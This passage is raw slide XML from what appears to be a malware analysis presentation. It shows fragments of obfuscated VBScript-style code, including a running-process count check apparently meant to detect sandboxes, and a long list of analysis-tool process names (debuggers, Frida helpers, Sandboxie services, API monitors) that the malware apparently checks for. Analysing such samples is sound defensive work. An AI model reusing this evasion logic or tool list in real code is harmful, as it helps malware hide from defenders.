              <a:highlight>
                <a:srgbClr val="00FF00"/>
              </a:highlight>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highlight>
                  <a:srgbClr val="00FF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>   			 Ldj</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="00FF00"/>
              </a:highlight>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rPr>
              <a:t>   		 End If</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rPr>
              <a:t>   	 Next</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rPr>
              <a:t>    Next</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rPr>
              <a:t>    GewqX("DEBUG: FS_PROCESS - True")</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highlight>
                  <a:srgbClr val="FF9900"/>
                </a:highlight>
              </a:rPr>
              <a:t>    If (BgId &lt; 28) Then</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FF9900"/>
              </a:highlight>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highlight>
                  <a:srgbClr val="FF9900"/>
                </a:highlight>
              </a:rPr>
              <a:t>   	 GewqX("DEBUG: FS_PROCESSCOUNT - False")</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FF9900"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FF9900"/>
                </a:highlight>
              </a:rPr>
              <a:t>   	 Ldj</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FF9900"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    End If</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk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464" name="Shape 464"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="465" name="Google Shape;465;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Array of Processes - Malware Analysis tools</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="466" name="Google Shape;466;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="1979100" cy="3416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605"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="989">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"frida-winjector-helper-64.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="989">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="605"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="989">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"frida-winjector-helper-32.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="989">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="605"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="989">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"pythonw.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="989">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="605"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="989">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"pyw.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="989">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="605"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="989">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"cmdvirth.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="989">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="605"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="989">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"alive.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="989">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="605"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="989">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"filewatcherservice.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="989">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="605"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="989">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"ngvmsvc.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="989">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="605"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="989">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"sandboxierpcss.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="989">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="605"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="989">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"analyzer.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="989">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="605"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="989">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"fortitracer.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="989">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="605"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="989">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"nsverctl.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="989">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="605"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="989">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"sbiectrl.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="989">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="605"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="989">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"angar2.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="989">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="605"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="989">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"goatcasper.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="989">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="605"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1390">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"ollydbg.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="1390">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="605"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="989">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"sbiesvc.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="989">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="605"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="989">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"apimonitor.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="989">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="605"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="989">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"GoatClientApp.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="989">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="605"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="989">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"peid.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="989">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="605"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="989">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"scanhost.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="989">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="605"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="989">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"apispy.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="989">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="605"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="989">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"hiew32.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="989">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="605"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="989">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"perl.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="989">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="605"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="989">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"scktool.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="989">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="467" name="Google Shape;467;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2196100" y="1152475"/>
            <a:ext cx="1495500" cy="370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900"/>
              <a:t>"apispy32.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"hookanaapp.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"petools.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"sdclt.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"asura.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"hookexplorer.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"pexplorer.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"sftdcc.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"autorepgui.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"httplog.exe",</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900"/>
              <a:t>"ping.exe",</a:t>
            </a:r>
